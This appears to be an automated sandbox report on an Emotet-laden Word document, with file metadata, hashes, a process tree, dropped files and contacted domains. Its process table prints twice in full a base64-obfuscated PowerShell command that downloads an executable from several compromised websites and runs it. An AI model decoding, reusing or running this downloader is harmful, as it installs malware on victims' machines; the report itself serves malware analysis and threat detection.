File name: | Payment Summary- Ref Id-R7681.doc |
Full analysis: | https://app.any.run/tasks/70131d46-b2ec-463b-8e57-88d287018805 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 09, 2019, 14:28:32 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Fresh, Subject: user-facing, Author: Cierra Ferry, Comments: Sleek communities Zimbabwe Dollar, Template: Normal.dotm, Last Saved By: Keon Hirthe, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 12:03:00 2019, Last Saved Time/Date: Tue Oct 8 12:03:00 2019, Number of Pages: 1, Number of Words: 28, Number of Characters: 166, Security: 0 |
MD5: | 6A735FA8BD183D5F78BFF3CF675B222F |
SHA1: | 108C7FFDA3D295F2EEB845369E1992A5E08BBC3A |
SHA256: | 72702E08E450EC04669CE011A8C94C5DDA6690029F6A9E0F4BDA95EB30B523EF |
SSDEEP: | 3072:IR4p3SQ7Sk62Yzs3MFAIxPxTqf7p1XmN2HSj/hN6vB1IVkLTTcuLkeH0yzCPIwCX:IR4p30kAs3MJPxTqfVdS2UNEXIVHU9 |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Flatley |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 193 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | Littel, Rippin and West |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 166 |
Words: | 28 |
Pages: | 1 |
ModifyDate: | 2019:10:08 11:03:00 |
CreateDate: | 2019:10:08 11:03:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | Keon Hirthe |
Template: | Normal.dotm |
Comments: | Sleek communities Zimbabwe Dollar |
Keywords: | - |
Author: | Cierra Ferry |
Subject: | user-facing |
Title: | Fresh |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2708 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Payment Summary- Ref Id-R7681.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
888 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiAHkAcABhAHMAcwBxAG0AbAA9ACcAbwB2AGUAcgByAGkAZABlAGoAegBtACcAOwAkAGEAcABwAGwAaQBjAGEAdABpAG8AbgBsAHcAbQAgAD0AIAAnADEANAA0ACcAOwAkAEwAaQBjAGUAbgBzAGUAZABtAHQAZgA9ACcASgBlAHcAZQBsAGUAcgB5AGYAaABoACcAOwAkAE4AYQB0AGkAbwBuAGEAbABoAHAAZAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQBwAHAAbABpAGMAYQB0AGkAbwBuAGwAdwBtACsAJwAuAGUAeABlACcAOwAkAEcAYQByAGQAZQBuAHMAdwBrAHoAPQAnAFQAZQB4AGEAcwBzAHQAYwAnADsAJABoAGEAcgBkAF8AZAByAGkAdgBlAG0AYgBoAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAagBlACcAKwAnAGMAdAAnACkAIABOAGUAVAAuAFcARQBiAEMATABpAEUAbgBUADsAJABDAGkAcgBjAGwAZQB6AHUAagA9ACcAaAB0AHQAcAA6AC8ALwB0AG8AbwBmAGEAbgBjAG8AbQAuAGMAbwBtAC4AbgBwAC8AdwBwAC0AYQBkAG0AaQBuAC8AVQBuAGkAUgB2AG8AbQByAC8AQABoAHQAdABwADoALwAvAGcAbwBsAGQAaQBuAGQAdQBzAHQAcgB5AC4AdABlAGMAaAAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHIAYQBtADIAdQBsADAAaABlAC0ANQBwADgAdwAtADMAOQA1ADYAMQAyADIALwBAAGgAdAB0AHAAcwA6AC8ALwByAG8AdABhAHIAYQBjAHQAMwAxADMAMQAuAG8AcgBnAC8AdwBwAC0AYQBkAG0AaQBuAC8AawBIAE8AVQBZAHQAcwAvAEAAaAB0AHQAcABzADoALwAvAGcAbwBnAG8AZwBvAC4AaQBkAC8AdwB3AHMAbABpAC8AbAAwADkAegBuAGEAOQA4AC0AMABtAGMAdwA1AHMALQA2ADgANAA0ADMAMQAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcABlAHQAcgBvAHUAcwBvAHIAdABoAG8ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBrAGkAeABkAGwAMQA2AGcAagAtAGgAeAA2ADIALQAzADEALwAnAC4AIgBzAFAAYABMAGkAdAAiACgAJwBAACcAKQA7ACQAUwBsAGUAZQBrAF8ARwByAGEAbgBpAHQAZQBfAEsAZQB5AGIAbwBhAHIAZABvAHQAYQA9ACcAdAByAGEAbgBzAG0AaQB0AHQAZQByAGoAbQBsACcAOwBmAG8AcgBlAGEAYwBoACgAJABxAHUAYQBuAHQAaQBmAHkAdgB1AGoAIABpAG4AIAAkAEMAaQByAGMAbABlAHoAdQBqACkAewB0AHIAeQB7ACQAaABhAHIAZABfAGQAcgBpAHYAZQBtAGIAaAAuACIAZABvAGAAVwBOAGAATABPAGAAQQBkAGYAaQBsAGUAIgAoACQAcQB1AGEAbgB0AGkAZgB5AHYAdQBqACwAIAAkAE4AYQB0AGkAbwBuAGEAbABoAHAAZAApADsAJABJAG4AdABlAGcAcgBhAHQAZQBkAGgAZgBuAD0AJwBhAHMAeQBuAGMAaAByAG8AbgBvAHUAcwB2AHoAcgAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAE4AYQB0AGkAbwBuAGEAbABoAHAAZAApAC4AIgBMAEUAbgBgAEcAVABoACIAIAAtAGcAZQAgADIANQAyADgANwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABBAHIAdAAiACgAJABOAGEAdABpAG8AbgBhAGwAaABwAGQAKQA7ACQAcgBlAGMAbwBuAHQAZQB4AHQAdQBhAGwAaQB6AGUAZgBzAGoAPQAnAG0AaQBzAHMAaQBvAG4AYwByAGkAdABpAGMAYQBsAGwAYgBjACcAOwBiAHIAZQBhAGsAOwAkAEkAbgB0AHIAYQBuAGUAdABrAG8AaQA9ACcAQwBhAG0AYgByAGkAZABnAGUAcwBoAGkAcgBlAHQAcABrACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGgAYQBjAGsAdgBuAHoAPQAnAEYAcgBvAHoAZQBuAHoAcgB3ACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1456 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiAHkAcABhAHMAcwBxAG0AbAA9ACcAbwB2AGUAcgByAGkAZABlAGoAegBtACcAOwAkAGEAcABwAGwAaQBjAGEAdABpAG8AbgBsAHcAbQAgAD0AIAAnADEANAA0ACcAOwAkAEwAaQBjAGUAbgBzAGUAZABtAHQAZgA9ACcASgBlAHcAZQBsAGUAcgB5AGYAaABoACcAOwAkAE4AYQB0AGkAbwBuAGEAbABoAHAAZAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQBwAHAAbABpAGMAYQB0AGkAbwBuAGwAdwBtACsAJwAuAGUAeABlACcAOwAkAEcAYQByAGQAZQBuAHMAdwBrAHoAPQAnAFQAZQB4AGEAcwBzAHQAYwAnADsAJABoAGEAcgBkAF8AZAByAGkAdgBlAG0AYgBoAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAagBlACcAKwAnAGMAdAAnACkAIABOAGUAVAAuAFcARQBiAEMATABpAEUAbgBUADsAJABDAGkAcgBjAGwAZQB6AHUAagA9ACcAaAB0AHQAcAA6AC8ALwB0AG8AbwBmAGEAbgBjAG8AbQAuAGMAbwBtAC4AbgBwAC8AdwBwAC0AYQBkAG0AaQBuAC8AVQBuAGkAUgB2AG8AbQByAC8AQABoAHQAdABwADoALwAvAGcAbwBsAGQAaQBuAGQAdQBzAHQAcgB5AC4AdABlAGMAaAAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHIAYQBtADIAdQBsADAAaABlAC0ANQBwADgAdwAtADMAOQA1ADYAMQAyADIALwBAAGgAdAB0AHAAcwA6AC8ALwByAG8AdABhAHIAYQBjAHQAMwAxADMAMQAuAG8AcgBnAC8AdwBwAC0AYQBkAG0AaQBuAC8AawBIAE8AVQBZAHQAcwAvAEAAaAB0AHQAcABzADoALwAvAGcAbwBnAG8AZwBvAC4AaQBkAC8AdwB3AHMAbABpAC8AbAAwADkAegBuAGEAOQA4AC0AMABtAGMAdwA1AHMALQA2ADgANAA0ADMAMQAvAEAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcABlAHQAcgBvAHUAcwBvAHIAdABoAG8ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBrAGkAeABkAGwAMQA2AGcAagAtAGgAeAA2ADIALQAzADEALwAnAC4AIgBzAFAAYABMAGkAdAAiACgAJwBAACcAKQA7ACQAUwBsAGUAZQBrAF8ARwByAGEAbgBpAHQAZQBfAEsAZQB5AGIAbwBhAHIAZABvAHQAYQA9ACcAdAByAGEAbgBzAG0AaQB0AHQAZQByAGoAbQBsACcAOwBmAG8AcgBlAGEAYwBoACgAJABxAHUAYQBuAHQAaQBmAHkAdgB1AGoAIABpAG4AIAAkAEMAaQByAGMAbABlAHoAdQBqACkAewB0AHIAeQB7ACQAaABhAHIAZABfAGQAcgBpAHYAZQBtAGIAaAAuACIAZABvAGAAVwBOAGAATABPAGAAQQBkAGYAaQBsAGUAIgAoACQAcQB1AGEAbgB0AGkAZgB5AHYAdQBqACwAIAAkAE4AYQB0AGkAbwBuAGEAbABoAHAAZAApADsAJABJAG4AdABlAGcAcgBhAHQAZQBkAGgAZgBuAD0AJwBhAHMAeQBuAGMAaAByAG8AbgBvAHUAcwB2AHoAcgAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAE4AYQB0AGkAbwBuAGEAbABoAHAAZAApAC4AIgBMAEUAbgBgAEcAVABoACIAIAAtAGcAZQAgADIANQAyADgANwApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABBAHIAdAAiACgAJABOAGEAdABpAG8AbgBhAGwAaABwAGQAKQA7ACQAcgBlAGMAbwBuAHQAZQB4AHQAdQBhAGwAaQB6AGUAZgBzAGoAPQAnAG0AaQBzAHMAaQBvAG4AYwByAGkAdABpAGMAYQBsAGwAYgBjACcAOwBiAHIAZQBhAGsAOwAkAEkAbgB0AHIAYQBuAGUAdABrAG8AaQA9ACcAQwBhAG0AYgByAGkAZABnAGUAcwBoAGkAcgBlAHQAcABrACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGgAYQBjAGsAdgBuAHoAPQAnAEYAcgBvAHoAZQBuAHoAcgB3ACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR5FAF.tmp.cvr | — | |
MD5:— | SHA256:— | |||
888 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T8O95K8OVPL0KJUMIDG9.temp | — | |
MD5:— | SHA256:— | |||
1456 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WZSN7HBOE7FEWUO451IP.temp | — | |
MD5:— | SHA256:— | |||
2708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\752CADA8.wmf | wmf | |
MD5:215D0B0DE3E4A4C3EB3F4B70834785C4 | SHA256:07E6FB6C694E91C56A6F1233BE28EAEA63B4B8D8777882D1BC712BCF2C361EC7 | |||
2708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3DD0BA50.wmf | wmf | |
MD5:99736E4EF8647EDCCAE7D819FFF9866F | SHA256:C6295FB242AD86AD2EE0D3B1EC4BB22FEDBB62B72DD15ABE6B7FB55D56B9F02B | |||
2708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C35924DE.wmf | wmf | |
MD5:EAC9FE406D9BA1EA2ADB347CEF03F96A | SHA256:9341A55677495BAB8EE4A37D44605B8B1D0176AB14DC465DEB4369F84D537777 | |||
2708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C2849C.wmf | wmf | |
MD5:463539274FB40D430862AF70D72BE5D6 | SHA256:10BEB908F90F826ED07EE56EADEDE2C05E51E887253DF382DF2AE901B55462C8 | |||
2708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7DC069F6.wmf | wmf | |
MD5:7B0FF9656C4FA1B79861BDE7C41C8B3A | SHA256:30BA589BF68744FC742FC55FF7C22E5B7DFDDCFE6DBA600F855041059F428CD2 | |||
2708 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:40339BC4B97E08EBBEDF59AD8DE3646E | SHA256:5A8FE97D05F638F5062769661B17F6FF5090174ECCD7D66EDD8AD4AC9F921558 | |||
2708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\174B010A.wmf | wmf | |
MD5:12839430AA91D6CCC280F1E0A0ED9457 | SHA256:F7674D7603E77C50620051FB26313FF5B427230D82A6E6BD8F34EDC7C71CFC4E |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
888 | powershell.exe | GET | — | 185.233.116.120:80 | http://goldindustry.tech/wp-includes/ram2ul0he-5p8w-3956122/ | unknown | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
888 | powershell.exe | 185.233.116.120:80 | goldindustry.tech | — | — | suspicious |
888 | powershell.exe | 159.65.217.255:80 | toofancom.com.np | — | US | suspicious |
Domain | IP | Reputation |
---|---|---|
toofancom.com.np |
| suspicious |
goldindustry.tech |
| suspicious |